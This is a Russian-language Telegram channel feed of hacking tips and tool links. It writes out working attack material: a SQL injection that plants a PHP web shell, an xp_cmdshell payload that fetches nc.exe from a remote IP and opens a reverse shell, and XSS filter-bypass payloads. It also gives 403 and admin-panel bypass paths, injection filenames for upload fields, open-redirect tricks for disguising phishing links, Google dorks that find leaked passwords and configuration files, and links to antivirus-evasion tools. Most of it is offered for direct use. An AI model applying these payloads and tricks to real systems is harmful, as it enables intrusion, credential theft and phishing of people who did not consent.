📗 Macrome - инструмент для внедрения полезной нагрузки в файл Excel.
Macrome создает документ Excel, содержащий обфусцированный лист макросов, используя предоставленный документ и полезную нагрузку макроса.
Более подробно о том, что на самом деле делает этот инструмент, можно найти здесь и здесь.
#av #redteam #soft
Ссылка на Github
Macrome создает документ Excel, содержащий обфусцированный лист макросов, используя предоставленный документ и полезную нагрузку макроса.
Более подробно о том, что на самом деле делает этот инструмент, можно найти здесь и здесь.
#av #redteam #soft
Ссылка на Github
GitHub
GitHub - michaelweber/Macrome: Excel Macro Document Reader/Writer for Red Teamers & Analysts
Excel Macro Document Reader/Writer for Red Teamers & Analysts - michaelweber/Macrome
📄 Получение конфиденциальных данных с использованием .json
Один из трюков, которые можно попробовать в веб-приложении, для получения конфиденциальных данных. Обычно, срабатывает на приложениях, основанных на Ruby.
Запрос:
Запрос:
#web
Один из трюков, которые можно попробовать в веб-приложении, для получения конфиденциальных данных. Обычно, срабатывает на приложениях, основанных на Ruby.
Запрос:
POST /ResetPassword HTTP/1.1
{"email":"victim@example.com"}
Ответ:HTTP/1.1 200 OK
Однако, если попробовать добавить расширение .json:Запрос:
POST /ResetPassword.json HTTP/1.1
{"email":"victim@example.com"}
Ответ:HTTP/1.1 200 OK
{"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"}
В результате добавления расширения .json в наш запрос, был получен секретный токен!#web
💉 Переход от SQL инъекции к шеллу или бэкдору
▫️Используем команду “into outfile” для записи в файл:
▫️Захватываем запрос в Burp Proxy и сохраняем в файл post-request, затем запускаем sqlmap:
▫️обратный шелл netcat через инъекцию mssql, когда доступен xp_cmdshell:
#web
▫️Используем команду “into outfile” для записи в файл:
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #
▫️Захватываем запрос в Burp Proxy и сохраняем в файл post-request, затем запускаем sqlmap:
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10
▫️обратный шелл netcat через инъекцию mssql, когда доступен xp_cmdshell:
1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--
#web
📌 Методы обхода XSS фильтров
Вот список из 7 полезных методов, позволяющих обойти WAF (брандмауэр веб-приложений) при использовании XSS в веб-приложении:
▫️Проверьте, не блокирует ли брандмауэр только строчные буквы:
▫️Попробуйте разбить регулярное выражение брандмауэра новой строкой "\r\n" (CRLF injection):
▫️Попробуйте двойное кодирование:
▫️Тестирование на рекурсивные фильтры, если брандмауэр удалит тэг <script>, у нас будет чистая полезная нагрузка:
▫️Инъекция анкор тега без пробелов:
▫️Попробуйте обойти пробелы с помощью маркера:
▫️Попробуйте изменить метод запроса (POST вместо GET):
Вот список из 7 полезных методов, позволяющих обойти WAF (брандмауэр веб-приложений) при использовании XSS в веб-приложении:
▫️Проверьте, не блокирует ли брандмауэр только строчные буквы:
<sCRipT>alert(1)</sCRiPt>
▫️Попробуйте разбить регулярное выражение брандмауэра новой строкой "\r\n" (CRLF injection):
<script>%0d%0aalert(1)</script>
▫️Попробуйте двойное кодирование:
%253Cscript%253Ealert(1)%253C%252Fscript%253E
▫️Тестирование на рекурсивные фильтры, если брандмауэр удалит тэг <script>, у нас будет чистая полезная нагрузка:
<scr<script>ipt>alert(1);</scr</script>ipt>
▫️Инъекция анкор тега без пробелов:
<a/href="j	a	v	asc	ri	pt:alert(1)">
▫️Попробуйте обойти пробелы с помощью маркера:
<svg•onload=alert(1)>
▫️Попробуйте изменить метод запроса (POST вместо GET):
GET /?q=xss#web
POST /
q=xss
👍1
🧨 Удаленное выполнение кода (RCE) в Apache Unomi (CVE-2020-13942)
Новая критическая уязвимость в одном из топовых продуктов Apache.
#web #rce
Читать статью
Ссылка на GitHub
Новая критическая уязвимость в одном из топовых продуктов Apache.
#web #rce
Читать статью
Ссылка на GitHub
Telegraph
Удаленное выполнение кода в Apache Unomi (CVE-2020-13942)
О платформе Платформа клиентских данных с открытым исходным кодом, Apache Unomi, содержала уязвимость, которая позволяла злоумышленникам отправлять вредоносные запросы с выражениями MVEL и OGNL (которые находятся в пакете Unomi). В конечном итоге это могло…
🎣 Несколько простых способов маскировки фишинговой ссылки
#phishing
Можно предварительно сократить с помощью Bitly или других сервисов сокращения ссылок.
https://vk.com/away.php?photo435_33&to=ССЫЛКА_НА_ВАШ_САЙТ
https://www.youtube.com/redirect?q=ССЫЛКА_НА_ВАШ_САЙТ
https://www.google.com/url?q=ССЫЛКА_НА_ВАШ_САЙТ
https://m.ok.ru/dk?__dp=y&_prevCmd=altGroupMain&st.cln=off&st.cmd=outLinkWarning&st.rfn=ССЫЛКА_НА_ВАШ_САЙТ
#phishing
👍2
Forwarded from burpsuite (not official)
BurpSuite and Friends
Post for russian speaking members about liked by BigitalSecurity plugins for BS:
https://habr.com/ru/company/dsec/blog/529088/
Post for russian speaking members about liked by BigitalSecurity plugins for BS:
https://habr.com/ru/company/dsec/blog/529088/
Хабр
Burp и его друзья
В этой статье мы расскажем о полезных плагинах для Burp Suite Professional — инструмента для анализа веб-приложений. Плагинов много, и, чтобы помочь аудиторам сделать правильный выбор, мы составили...
🪓 Охота на Cisco (CVE: 2020–3187, 2020–3452)
В этой статье я расскажу о том, как найти и эксплуатировать недавние уязвимости в Cisco VPN.
#web #cve
Читать статью
В этой статье я расскажу о том, как найти и эксплуатировать недавние уязвимости в Cisco VPN.
#web #cve
Читать статью
Telegraph
Охота на Cisco (CVE: 2020–3187, 2020–3452)
В этой статье я расскажу о том, насколько легко найти CVE: 2020–3187 &, 2020-3452 и какие шаги для этого нужно предпринять. Для этого нам нужно сосредоточиться на поддоменах целей, которые работают в Cisco VPN. Первичный поиск Для поиск поддоменов используем…
🧷 Изменяем URL для доступа к админ-панели
В некоторых случаях можно получить доступ к панели администратора, изменив URL следующим образом:
В некоторых случаях можно получить доступ к панели администратора, изменив URL следующим образом:
https://target.com/admin/ –> HTTP 302 (redirect to login page)#web
https://target.com/admin..;/ –> HTTP 200 OK
https://target.com/../admin –> HTTP 200 OK
https://target.com/whatever/..;/admin –> HTTP 200 OK
🚫 Получаем доступ к закрытым ресурсам. Способы обхода ошибки 403 (403 Forbidden)
Если при обращению к директории вы видите ошибку 403 и доступ вам закрыт:
вы можете попробовать следующие полезные нагрузки для обхода:
#web
Если при обращению к директории вы видите ошибку 403 и доступ вам закрыт:
GET
/admin -> 403 Forbidden
вы можете попробовать следующие полезные нагрузки для обхода:
GET
/accessible/..;/admin -> 200 OK
/.;/admin -> 200 OK
/admin;/ -> 200 OK
/admin/~ -> 200 OK
/./admin/./ -> 200 OK
/admin?param -> 200 OK
/%2e/admin -> 200 OK
/admin# -> 200 OK
#web
👍2
SHADOW:Group
🚫 Получаем доступ к закрытым ресурсам. Способы обхода ошибки 403 (403 Forbidden) Если при обращению к директории вы видите ошибку 403 и доступ вам закрыт: GET /admin -> 403 Forbidden вы можете попробовать следующие полезные нагрузки для обхода: GET /…
В продолжение темы, нашёл инструмент, представляющий из себя простой bash-скрипт автоматизирующий способы выше и реализующий некоторые другие методы обхода:
https://github.com/lobuhi/byp4xx
https://github.com/lobuhi/byp4xx
GitHub
GitHub - lobuhi/byp4xx: 40X/HTTP bypasser in Go. Features: Verb tampering, headers, #bugbountytips, User-Agents, extensions, default…
40X/HTTP bypasser in Go. Features: Verb tampering, headers, #bugbountytips, User-Agents, extensions, default credentials... - lobuhi/byp4xx
📂 Загрузка произвольного файла в Mara CMS 7.5 (CVE-2020–25042)
Классическая уязвимость, позволяющая нам выполнять команды на целевой системе.
#web #cve
Читать статью
Классическая уязвимость, позволяющая нам выполнять команды на целевой системе.
#web #cve
Читать статью
Telegraph
Загрузка произвольного файла в Mara CMS 7.5 (CVE-2020–25042)
Введение Mara CMS - это файловая система управления контентом с открытым исходным кодом. Она построена с использованием HTML5 и CSS3 и является весьма простой в использовании, благодаря функции редактирования с помощью перетаскивания. Другие функции включают…
Media is too big
VIEW IN TELEGRAM
🔓 Обход 2FA в Instagram через уязвимую страницу
Данный сценарий почти на грани фантастики, но все же, имеет место быть. Подойдет скорее для повторного доступа ко взломанной странице, если жертва смогла ее восстановить, поменяла пароль в инстаграм (но не поменяла на почте) и включила 2FA. При этом атакующий должен знать учетные данные от почты и аккаунта жертвы (они могут совпадать).
#bug
Данный сценарий почти на грани фантастики, но все же, имеет место быть. Подойдет скорее для повторного доступа ко взломанной странице, если жертва смогла ее восстановить, поменяла пароль в инстаграм (но не поменяла на почте) и включила 2FA. При этом атакующий должен знать учетные данные от почты и аккаунта жертвы (они могут совпадать).
#bug
📤 SSRF (подделка запросов на стороне сервера) стоимостью 4913$
Не стоит думать, что в крупных компаниях не бывает уязвимостей и там уже все проверено. В данной статье будет рассмотрена уязвимость в HelloSign от DropBox, позволившая автору получить крупное вознаграждение за ее находку.
#web #ssrf
Читать статью
Не стоит думать, что в крупных компаниях не бывает уязвимостей и там уже все проверено. В данной статье будет рассмотрена уязвимость в HelloSign от DropBox, позволившая автору получить крупное вознаграждение за ее находку.
#web #ssrf
Читать статью
Telegraph
SSRF (подделка запросов на стороне сервера) стоимостью 4913$
Вступление Всем привет, в сегодняшней статье мы рассмотрим уязвимость, за которую автор получил почти 5 тысяч долларов по программе Dropbox Bug Bounty. Это уязвимость SSRF - подделка запросов на стороне сервера. Программа Dropbox показалась автору очень…
👍1
🔎 Shodan выкатывает бета-версию с новыми примерами фильтров для поиска
#web #shodan
https://beta.shodan.io/search/examples
#web #shodan
https://beta.shodan.io/search/examples
🦠 PEzor - инструмент с открытым исходным кодом для обхода антивирусных решений
Реализацию и принцип работы данного инструмента можно почитать в блоге автора.
#redteam #av #malware
Ссылка на GitHub
Реализацию и принцип работы данного инструмента можно почитать в блоге автора.
#redteam #av #malware
Ссылка на GitHub
📨 Получение других уязвимостей при загрузке файла
При тестировании функций загрузки файлов в веб-приложении попробуйте установить для имени файла следующие значения:
▫️
▫️
▫️
▫️
Эти полезные нагрузки могут вызвать дополнительные уязвимости.
#web
При тестировании функций загрузки файлов в веб-приложении попробуйте установить для имени файла следующие значения:
▫️
../../../tmp/lol.png -> для уязвимости Path Traversal▫️
sleep(10)-- -.jpg -> для SQL-инъекции▫️
<svg onload=alert(document.domain)>.jpg/png -> для XSS▫️
; sleep 10; -> для command injectionЭти полезные нагрузки могут вызвать дополнительные уязвимости.
#web
📖 UltimateWDACBypassList
Централизованный ресурс, содержащий обширный список техник обхода Windows Defender Application Control (WDAC) с описанием и ссылками для каждой техники.
#av #redteam
Ссылка на GitHub
Централизованный ресурс, содержащий обширный список техник обхода Windows Defender Application Control (WDAC) с описанием и ссылками для каждой техники.
#av #redteam
Ссылка на GitHub
📚 Udemy: Pentesting and Security Web Application
Бесплатно только сегодня! Первоначальная цена курса 7 490 руб.
Скидка 100%
#web
Ссылка на курс
Бесплатно только сегодня! Первоначальная цена курса 7 490 руб.
Скидка 100%
Промокод - EARLYBIRD
#web
Ссылка на курс
Udemy
Pentesting with Daniel Slater (Ethical Hacking/Web Security)
Join 170,000+ students - Learn cyber security, penetration testing (pentesting) and ethical hacking
🔎 Небольшая подборка интересных Google дорков
▫️FTP серверы и сайты
▫️Лог файлы с паролями:
▫️Списки с email адресами:
▫️Открытые камеры:
#web #google
▫️FTP серверы и сайты
intitle:“index of” inurl:ftp after:2018
▫️Лог файлы с паролями:
allintext:password filetype:log after:2018
▫️Файлы конфигураций с паролями:
filetype:env “DB_PASSWORD” after:2018
▫️Списки с email адресами:
filetype:xls inurl:“email.xls”
▫️Открытые камеры:
inurl:top.htm inurl:currenttime
#web #google
👍1